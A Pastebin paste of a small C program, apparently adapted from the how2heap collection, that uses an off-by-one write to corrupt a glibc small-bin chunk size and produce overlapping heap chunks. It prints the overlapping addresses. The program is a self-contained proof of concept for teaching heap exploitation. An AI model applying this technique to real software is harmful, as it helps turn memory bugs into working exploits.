Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /* Similar to overlapping_chunks.c (from how2heap) with a small change.
- * Instead of overwriting size of unsorted chunk, overwrite size of small chunk.
- * Now you have to malloc the original size to retrieve this chunk
- * Freeing again will now create an overlapped chunk in the unsorted bin which
- * can later be retrieved using malloc(corrupt_size);
- */
- #include <stdio.h>
- #include <stdlib.h>
- int main() {
- char *p1 = malloc(0x108);
- char *p2 = malloc(0x108);
- char *p3 = malloc(0x0); // Preventing merge with top chunk
- free(p2); // Unsorted bin
- char *p4 = malloc(0x200); // p2 goes to smallbin
- // Off by one vuln
- p1[0x108] = 0x51;
- // p2's size is now 0x150, but still in 0x110 smallbin
- // Hence, it will be returned in malloc(0x108)
- //
- // NOTE: A chunk of size 0x150 is returned for a requested size
- // of 0x108
- char *p5 = malloc(0x108);
- // Setting some valid size of the next chunk
- p4[0x10 + 0x8] = 0x21;
- // Setting next chunk to be in use
- p4[0x10 + 0x20 + 0x8] = 0x1;
- free(p5); // p2 freed again
- // Now we have a free chunk of size 0x150 in unsorted bin
- // which is overlapping with p3!!
- char *p6 = malloc(0x140);
- fprintf(stderr, "Overlap p6: %p - %p, p3: %p\n", p6, p6 + 0x140, p3);
- return 0;
- }
Add Comment
Please, Sign In to add comment